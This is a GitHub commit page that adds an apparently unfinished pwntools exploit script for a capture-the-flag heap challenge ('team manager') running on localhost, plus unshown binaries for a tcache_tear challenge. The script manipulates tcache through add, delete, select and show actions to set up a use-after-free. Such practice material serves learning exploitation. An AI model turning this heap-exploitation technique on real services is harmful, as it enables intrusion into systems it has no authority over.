Skip to content
This repository has been archived by the owner on Mar 1, 2023. It is now read-only.

Commit

Permalink
Add tcache_tear files
Browse files Browse the repository at this point in the history
  • Loading branch information
lromerio committed Jun 18, 2021
1 parent 2b03abe commit 3f94bde
Show file tree
Hide file tree
Showing 3 changed files with 70 additions and 0 deletions.
70 changes: 70 additions & 0 deletions 20210608_teammanager/exploit.py
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,70 @@
from pwn import *


# Path to the target binary
BINARY = './team2'

# Host and port where the challenge is running
HOST = 'localhost'
PORT = 9997


e = ELF(BINARY)
context.binary = e

r = remote(HOST, PORT)

def add_player(name="a"):
r.sendline("1")
r.sendline(name)
r.sendline("2")
r.sendline("2")
r.sendline("2")
r.sendline("2")

def delete_player(idx=0):
r.sendline("2")
r.sendline(str(idx))

def select_player(idx=0):
r.sendline("3")
r.sendline(str(idx))

def show_player(idx=0):
r.sendline("5")
r.sendline(str(idx))


print(e.got['free'])


largename = 'a'*0x80
shortname = 'b'*0x18


# fill tcache, players from 0 to 6
log.info("Filling tcache")
for i in range(4):
add_player(largename)
for i in range(4):
delete_player(i)


# now we have only one block in the true bins
# which is the last pstruct created

log.info("Creating pstruct 1 and 2")
add_player() #pstruct 1
add_player() #pstruct 2


log.info("Selecting p7")
select_player(7)
log.info("Deleting p7")
delete_player(7)

show_player(3)
r.sendline("6")

r.interactive()

Binary file added 20210620_tcache_tear/libc-18292bd12d37bfaf58e8dded9db7f1f5da1192cb.so
View file
Binary file not shown.
Binary file added 20210620_tcache_tear/tcache_tear
View file
Binary file not shown.

0 comments on commit 3f94bde

Please sign in to comment.